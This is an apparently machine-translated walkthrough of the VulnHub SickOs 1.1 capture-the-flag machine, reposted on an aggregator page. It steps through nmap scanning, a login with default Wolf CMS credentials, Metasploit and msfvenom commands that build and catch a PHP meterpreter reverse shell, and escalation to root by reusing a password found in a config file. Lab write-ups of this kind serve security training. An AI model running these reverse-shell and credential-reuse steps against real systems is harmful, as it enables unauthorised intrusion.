VulnHub drone-SickOs1.1

Others 2021-02-27 16:57:47 views: null

VulnHub drone-SickOs1.1

Download address: https://www.vulnhub.com/entry/sickos-11,132/ After
downloading the target machine, open it under VMware Workstation, and configure the network card as a bridge.
Task : Elevate privileges and obtain flag
Attack machine: kali linux 192.168.8.195
target machine : 192.168.8.194

Article Directory

1. Information collection

nmap detects the surviving host and finds the target drone
Command: nmap -sP 192.168.8.0/24
Insert picture description here

nmap scans the open ports of the target machine and knows that ports 22, 3128, and 8080 are open, and it prompts that you need to proxy port 3128 to access the
command: nmap -A -p- 192.168.8.194
Insert picture description here
proxy 192.168.8.194 : 3128
Insert picture description here
access 192.168.8.194, Looking at the source code, no useful information was found.
Insert picture description here
Try to access robots.txt, you can
Insert picture description here
visit http://192.168.8.194/wolfcms from /wolfcms, woflcms is a lightweight cms program written in PHP. The background entrance is http://192.168.8.194/wolfcms/?/admin/login
Insert picture description hereInsert picture description here
. The default user name and password of wolfcms are admin and admin respectively. Try to log in, log in successfully, and find the file upload location on the page
Insert picture description here

二、Getshell

Here select the file upload getshell. The method is msfvenom generates a Trojan horse, msfconsole monitors, after uploading the file, execute the file to getshell

msfconsole monitors, where lhost is set to the IP of the attacker, and lport can set a listening port at will.
Command:
use exploit/multi/hadler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.8.195
set lport 4444
run
Insert picture description here
msfvenom generates a shellcode, put the shellcode Copy it to a php file, here copy it to the slow.php
command: msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.8.195 lport=4444 -f raw
-p: select a payload
-f: output format, here select raw format , Raw is a native format with only data in it
Insert picture description here
. After uploading slow.php, visit public and execute slow.php
Insert picture description here
successfully to getshell
Insert picture description here

Three, right escalation

Python enters pseudo-protocol
Insert picture description here

Check the configuration file config.php of wolfcms, you can find the user name and password to
Insert picture description here
log in to root, but the login fails, check /etc/passwd, find sickos, the default id of the first user added in linux is 1000, this sickos is the first user
Insert picture description here

Try to log in to sickos, successfully log in
Insert picture description here

Log in to root from the sickos user.
Insert picture description hereAfter successfully logging in, find the flag in the /root directory. So far, the target machine has been completed.

Guess you like

Origin blog.csdn.net/Slow_/article/details/113945004
Recommended
Ranking
#2019110700005
What materials and procedures are required for patent transfer
What is the blockchain Ethereum triplet state root transaction root receipt root
Front-end study notes 04 --- About the insertion of html pictures and videos
Documents required for the filing of WeChat Mini Programs in special industries, the filing process of WeChat Mini Programs in special industries, how to file WeChat Mini Programs in special industries
2017 Qingdao-site tournament I The Squared Mosquito Coil
[BZOJ3165][HEOI2013]Segment (line segment tree without marking)
Kettle series: KettleEasyExpand, an open source Kettle universal plugin by Ma Jinju
The latest tutorial on making framework for iOS
DAX Section 6: Statistical Functions
Daily
More
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)

Code World

© 2018 codetd.com